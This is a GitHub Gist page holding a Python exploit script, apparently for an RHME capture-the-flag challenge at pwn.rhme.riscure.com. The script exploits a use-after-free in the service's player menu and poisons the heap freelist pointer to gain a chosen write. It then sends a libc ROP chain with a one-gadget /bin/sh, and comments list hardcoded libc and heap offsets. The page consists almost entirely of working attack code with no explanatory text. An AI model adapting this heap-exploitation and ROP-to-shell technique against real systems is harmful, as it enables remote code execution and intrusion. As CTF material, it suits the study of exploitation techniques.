Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
#!/usr/bin/env python
import socket
import time
import telnetlib
import struct
LIBC_BASE = 0x7eff13bcb000
HEAP_BASE = 0x248b000
SLEEP_TIME = 1
t = telnetlib.Telnet()
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("pwn.rhme.riscure.com",1337))
#s.connect(("127.0.0.1",1337))
def doRecv():
print "<< ", s.recv(1024)
time.sleep(SLEEP_TIME)
def doSend(data):
print ">> ", data
s.send(data + "\n")
time.sleep(SLEEP_TIME)
doRecv()
blahfuck = raw_input('attach debugger and press enter..')
doRecv()
doSend("1") # add our fake chunk player
doSend("fake")
doSend("33")
doSend("0")
doSend("33")
doSend("0")
doSend("1")
doSend("hax") # add a player
doSend("1")
doSend("1")
doSend("1")
doSend("1")
doSend("3") # get a pointer to it
doSend("1")
doSend("2") # free underlying data
doSend("1")
doSend("4")
doSend("1")
# the below is a heap offset | this is 0x1620 offset from heap base.
# heap base == 0x1a34000
# offset: 0x1620
# == 0x1a35620
doSend(struct.pack('<L', HEAP_BASE + 0x1620)) # modify the freelist FD pointer to point at our fake chunk
doSend("0")
doSend("1")
doSend("A"*128) # alloc a new player with a non-fastbin name to get uneven freelist
doSend("3") # so our poisoned malloc is in response to the Name malloc
doSend("3")
doSend("3")
doSend("3")
doSend("1")
doSend("\x40\x30\x60") # the malloc for this request will be serviced using our poisoned freelist, so will
doSend("4") # return a pointer of our choosing. subsequent writes will be to a destination of
doSend("4") # of our choosing
doSend("4")
doSend("4")
doSend("3")
doSend("0")
doSend("4")
doSend("1")
doSend(struct.pack('<Q', LIBC_BASE + 0x101f80))
doSend("1")
g1 = struct.pack('<Q', LIBC_BASE + 0x34a70)
g2 = struct.pack('<Q', LIBC_BASE + 0x1fb78)
g3 = struct.pack('<Q', LIBC_BASE + 0xcd0f3)
s.send(g1+g2+"\x00\x00\x00\x00\x00\x00\x00\x00" + g3 + "HXHXHXHXHXHXHXHXHXHXH\n")
t.sock = s
t.interact()
# /bin/sh 0x7f50304e40f3 this is the one requiring RCX and R12 null | libc offset 0xcd0f3
# /bin/sh 0x7f503050d6c0
# 0x7f5030436b7b 0x1fb7b xor eax eax, ret
# 0x7f503044ba70 0x34a70 xor ecx, ecx, .... ret
# 0x7f5030436b78 0x1fb78 pop r12, ret
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.